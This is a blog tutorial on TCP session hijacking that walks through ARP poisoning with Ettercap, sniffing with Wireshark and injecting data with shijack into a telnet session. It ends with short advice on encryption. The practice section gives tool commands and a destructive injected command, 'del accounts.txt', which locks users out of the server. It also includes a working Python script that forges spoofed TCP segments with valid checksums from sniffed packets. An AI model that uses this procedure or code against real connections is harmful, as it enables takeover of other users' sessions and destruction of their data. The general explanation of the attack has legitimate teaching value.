TCP Session Hijacking with SHijack

Posted by on April 19, 2019 at 1:08 am.

What is Session Hijacking?

Session hijacking is when an unauthorized party takes over another user's established network connection. The usual aim is to bypass password authentication: the password check happens only once, at the start of the session, so an attacker who steps into the session after that point inherits the user's access without ever supplying credentials.

TCP/IP hijacking, also called active sniffing (as opposed to passively reading traffic), means the attacker gets onto the path of an existing connection, knocks the legitimate host off it, and continues the connection from another machine that uses the same IP address and port and the sequence numbers the real host was using. Done quickly, this gives the attacker the live session and whatever access the original system had. The server cannot tell that anything happened, because at the TCP level the spoofed segments are indistinguishable from the trusted client's, so it keeps responding as if the client were still talking.

Who does TCP Session Hijacking, and Why?

The attackers who carry out session hijacking are usually after the personal data of a target user, or after the privileges of the account itself: taking over a live session gives them both without the trouble of obtaining the user's ID and password or defeating any other authentication. They rely on unencrypted protocols, because a cleartext session is both readable and forgeable. The information they need is the connection's four-tuple (client IP and port, server IP and port) plus the current TCP sequence and acknowledgement numbers, which a tool such as shijack reads from sniffed packets.

Where and When does Session Hijacking usually occur?

As noted above, session hijacking is possible when the protocol in use is not encrypted (telnet, rlogin, FTP and plain HTTP are the classic cases). The attacker is usually on the same network segment as the victim, because that is where sniffing and ARP poisoning work: from there the IP addresses, ports and sequence numbers of a live connection can be read straight off the wire.

How to do TCP Session Hijacking (Practice)

Ettercap – performs the man-in-the-middle attack by ARP poisoning, so that traffic between the victim (target) and the server passes through the attacker's machine.

Wireshark – captures the packets exchanged between target and server, so that the connection's addresses and ports can be read off.

SHIJACK – the best-known tool for TCP/IP hijacking. It sniffs the sequence numbers of an existing connection and then sends spoofed segments carrying the attacker's data in place of the client's. Shijack is a small C program built on libnet; the archive ships the source (shijack.c) together with prebuilt Linux and FreeBSD binaries.

Link: http://packetstormsecurity.com/sniffers/shijack.tgz

Scenario – We aim to hijack a telnet session between a server and a client.

  1. Set up a telnet connection between the server and the client (target).
  2. Use Ettercap to get in the middle of that connection: start unified sniffing, scan for hosts, then add the server's IP address as Target 1 and the victim's IP address as Target 2.
  3. Start the attack from the MITM tab with ARP poisoning, so that both hosts send their traffic through the attacker's machine.
  4. Run Wireshark on the attacker's machine as a sniffer to capture packets from the telnet connection. From any one of them, note the four values shijack needs: source IP, source port, destination IP and destination port.
  5. Run shijack against the connection with those values. Its usage line is shijack <interface> <src ip> <src port> <dst ip> <dst port> [-r]; the optional -r resets the connection instead of hijacking it.
  6. shijack listens on the interface until it sees a segment of that connection, takes the current sequence and acknowledgement numbers from it, and from then on everything typed into it is sent to the server as spoofed segments from the client's address and port.
  7. Once the hijacked session was up, I tried to permanently delete the telnet server's account credentials. The telnet server ran Windows, so the command typed into the shijack session was del accounts.txt. After that, any user who tries to log in to the telnet server gets an error.

Two things worth knowing before trying this: shijack has to see live segments to learn the sequence numbers, which is why the ARP poisoning step is required rather than optional; and once data has been injected, the real client's sequence numbers no longer match what the server expects, so the legitimate user's session is desynchronised from that point on.
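The part of the procedure that the tool hides is how the spoofed segment is built. The following is an added example written for this post, not shijack's own code: it takes one sniffed IPv4/TCP packet of the telnet session (a constructed stand-in for the packet read off Wireshark in step 4), pulls out the four addressing values and the current sequence/acknowledgement numbers, and forges the segment the server will accept next as though the client had typed the del accounts.txt command from step 7, with valid IP and TCP checksums. Handing the bytes to a raw socket is left out so that it runs offline; the hosts 10.0.0.2 (server, port 23) and 10.0.0.5 (client, port 50000) and all sequence numbers are made up.

```python
"""Forging the injected TCP segment for a sniffed session.

Added example for this post, not shijack's own code. All addresses, ports and
sequence numbers below are constructed; nothing is sent on the wire.
"""
import socket
import struct

FIN, SYN, PSH, ACK = 0x01, 0x02, 0x08, 0x10


def checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_packet(pkt: bytes) -> dict:
    """Pull the fields a hijacker needs out of a raw IPv4/TCP packet (no link layer)."""
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _cs, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", pkt[:20])
    if proto != 6:
        raise ValueError("not a TCP packet")
    ihl = (ver_ihl & 0x0F) * 4
    seg = pkt[ihl:total_len]
    sport, dport, seq, ack, off_flags, _win, _tcs, _urg = struct.unpack("!HHIIHHHH", seg[:20])
    doff = (off_flags >> 12) * 4
    return {
        "src": socket.inet_ntoa(src), "sport": sport,
        "dst": socket.inet_ntoa(dst), "dport": dport,
        "seq": seq, "ack": ack, "flags": off_flags & 0x01FF,
        "payload": seg[doff:],
    }


def build_packet(src, sport, dst, dport, seq, ack, flags, payload: bytes, ident=0) -> bytes:
    """Build an IPv4/TCP packet (no options) with valid IP and TCP checksums."""
    tcp_len = 20 + len(payload)
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, ack, (5 << 12) | flags, 65535, 0, 0)
    # The TCP checksum covers a pseudo-header (addresses, protocol, length) plus the segment.
    pseudo = socket.inet_aton(src) + socket.inet_aton(dst) + struct.pack("!BBH", 0, 6, tcp_len)
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp + payload)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, ident, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp + payload


def checksums_valid(pkt: bytes) -> bool:
    """The receiver's check: a checksummed unit sums to zero when intact."""
    ihl = (pkt[0] & 0x0F) * 4
    total_len = struct.unpack("!H", pkt[2:4])[0]
    seg = pkt[ihl:total_len]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(seg))
    return checksum(pkt[:ihl]) == 0 and checksum(pseudo + seg) == 0


def next_client_segment(sniffed: bytes, client: tuple, server: tuple, payload: bytes) -> bytes:
    """From the last sniffed segment (either direction), forge the segment the server
    will accept next as if the client had sent `payload`."""
    p = parse_packet(sniffed)
    # SYN and FIN each consume one sequence number, exactly like a byte of data.
    consumed = len(p["payload"]) + bool(p["flags"] & SYN) + bool(p["flags"] & FIN)
    if (p["src"], p["sport"]) == client and (p["dst"], p["dport"]) == server:
        seq, ack = p["seq"] + consumed, p["ack"]      # client spoke last: continue its stream
    elif (p["src"], p["sport"]) == server and (p["dst"], p["dport"]) == client:
        seq, ack = p["ack"], p["seq"] + consumed      # server spoke last: answer where it expects
    else:
        raise ValueError("segment does not belong to the target connection")
    return build_packet(client[0], client[1], server[0], server[1],
                        seq & 0xFFFFFFFF, ack & 0xFFFFFFFF, PSH | ACK, payload)


# Constructed stand-in for the packet read off Wireshark in step 4: the telnet server
# (10.0.0.2:23) has just sent its login prompt to the client (10.0.0.5:50000).
CLIENT = ("10.0.0.5", 50000)
SERVER = ("10.0.0.2", 23)
SNIFFED = build_packet(SERVER[0], SERVER[1], CLIENT[0], CLIENT[1],
                       seq=1000, ack=5000, flags=PSH | ACK, payload=b"login: ")


def demo() -> dict:
    """Forge the injected command from step 7 and return what the server would parse."""
    forged = next_client_segment(SNIFFED, CLIENT, SERVER, b"del accounts.txt\r\n")
    parsed = parse_packet(forged)
    parsed["valid"] = checksums_valid(forged)
    return parsed


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:8} {value!r}")
```

The forged segment claims the client's address and port, carries seq 5000 (the number the server told the client to use next) and acks 1007 (the prompt's seq plus its seven bytes), so the server accepts it as the client's next input. That is also the whole reason the real client falls out of sync afterwards: its own counters never advanced past 5000.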

Conclusion and Solution

As discussed above, session hijacking is quite dangerous: an unauthorized party takes over another user's established network connection, and because password authentication happens only at the start of the session, the hijacker inherits the authenticated session without ever supplying credentials.

To prevent session hijacking, the server side should encrypt its protocols wherever possible (SSH in place of telnet, TLS for everything else): an attacker who cannot read the stream cannot learn the session state, and cannot forge data the other end will accept. On the client side, avoid using unencrypted services over public networks shared with strangers, since a hijacker needs to be on the same network segment to poison ARP and sniff the connection.
